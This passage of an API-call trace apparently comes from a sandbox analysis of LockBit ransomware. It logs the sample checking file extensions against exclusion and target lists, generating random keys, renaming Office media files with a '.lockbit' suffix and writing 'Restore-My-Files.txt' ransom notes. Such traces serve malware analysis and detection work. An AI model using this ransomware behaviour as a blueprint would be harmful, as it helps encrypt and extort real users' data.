lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.383] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.383] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.383] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF.lockbit") returned 76 [0209.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15155_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.385] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.385] malloc (_Size=0x40068) returned 0x3df0008 [0209.385] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=277) returned 1 [0209.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.386] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.389] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.389] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.389] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.389] free (_Block=0x1fa2ed8) [0209.389] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.389] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.389] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.390] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3c1d00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xab3c1d00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x143, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15156_.GIF", cAlternateFileName="")) returned 1 [0209.390] lstrcmpiW (lpString1=".", lpString2="BD15156_.GIF") returned -1 [0209.390] lstrcmpiW (lpString1="..", lpString2="BD15156_.GIF") returned -1 [0209.390] PathFindExtensionW (pszPath="BD15156_.GIF") returned=".GIF" [0209.390] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.390] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.390] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.390] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.390] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.390] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.390] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.390] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.391] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.391] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15156_.GIF") returned 1 [0209.392] lstrcmpiW (lpString1="ntldr", lpString2="BD15156_.GIF") returned 1 [0209.392] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15156_.GIF") returned 1 [0209.392] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15156_.GIF") returned 1 [0209.392] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15156_.GIF") returned -1 [0209.392] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15156_.GIF") returned 1 [0209.392] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15156_.GIF") returned 1 [0209.392] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.392] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF") returned=".GIF" [0209.392] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.392] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.392] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.393] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.393] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF.lockbit") returned 76 [0209.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15156_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.394] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.394] malloc (_Size=0x40068) returned 0x3df0008 [0209.394] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=323) returned 1 [0209.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.398] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.402] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.402] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.402] free (_Block=0x1fa2ed8) [0209.402] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.402] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.402] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f09b00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd3f09b00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15184_.GIF", cAlternateFileName="")) returned 1 [0209.402] lstrcmpiW (lpString1=".", lpString2="BD15184_.GIF") returned -1 [0209.402] lstrcmpiW (lpString1="..", lpString2="BD15184_.GIF") returned -1 [0209.402] PathFindExtensionW (pszPath="BD15184_.GIF") returned=".GIF" [0209.402] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.402] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.403] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.403] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.404] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15184_.GIF") returned 1 [0209.404] lstrcmpiW (lpString1="ntldr", lpString2="BD15184_.GIF") returned 1 [0209.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15184_.GIF") returned 1 [0209.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15184_.GIF") returned 1 [0209.404] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15184_.GIF") returned -1 [0209.404] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15184_.GIF") returned 1 [0209.404] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15184_.GIF") returned 1 [0209.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF") returned=".GIF" [0209.404] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.404] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.405] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.405] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.405] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF.lockbit") returned 76 [0209.406] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15184_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.407] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.407] malloc (_Size=0x40068) returned 0x3df0008 [0209.407] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1154) returned 1 [0209.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.408] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.431] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.431] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.431] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.433] free (_Block=0x1fa2ed8) [0209.433] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.433] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.433] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.433] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f09b00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcb1b380, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd3f09b00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15185_.GIF", cAlternateFileName="")) returned 1 [0209.433] lstrcmpiW (lpString1=".", lpString2="BD15185_.GIF") returned -1 [0209.433] lstrcmpiW (lpString1="..", lpString2="BD15185_.GIF") returned -1 [0209.433] PathFindExtensionW (pszPath="BD15185_.GIF") returned=".GIF" [0209.433] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.433] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.433] lstrcmpiW 